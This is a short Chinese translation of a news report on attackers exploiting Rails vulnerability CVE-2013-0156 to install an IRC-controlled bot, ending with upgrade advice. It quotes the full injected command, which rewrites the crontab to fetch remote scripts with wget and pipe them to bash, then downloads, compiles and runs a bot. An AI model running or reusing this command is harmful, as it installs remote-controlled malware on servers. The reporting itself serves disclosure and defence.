在過去的幾天里，攻擊者已經越來越多地試圖通過一個 Rails 框架的安全漏洞來攻陷服務器。成功的入侵者在服務器上安裝一個機器人，使其等到來自 IRC 頻道的進一步指示。

在安全專家 Jeff Jarmoc 的博客中寫到，攻擊者是通過 CVE 2013-0156 漏洞試圖攻擊的。盡管該漏洞已經在1月份時關閉，但還有相當多的服務器仍然運行過時的 Ruby 版本。Jarmoc 稱攻擊者嘗試注入如下命令：

crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k

這導致系統自動下載 bot (k.c) 編譯然后執行，Jarmoc 在其博客上也公布了該機器人程序的源碼。“k” 嘗試聯系位于 cvv4you.ru 域的 IRC 服務器，然后加入 #rails 頻道，在這里等待進一步的攻擊指令。Jarmoc 稱 k 程序可通過指令下載并執行任意代碼。目前該 IRC 服務器已經能夠不可用，至少現在的地址是不可用的。

該機器人程序在進程列表中顯示為 "- bash" ，啟動時會同時創建一個 /tmp/tan.pid 文件以確保同一時間只有一個進程實例運行。所有使用 Rails 框架的用戶應該確認正在使用當前的 Rails 版本，當前可靠的版本包括：3.2.13, 3.1.12 and 2.3.18.

英文原文： h-online

譯文鏈接：http://www.oschina.net/news/40942/attack-wave-on-ruby-on-rails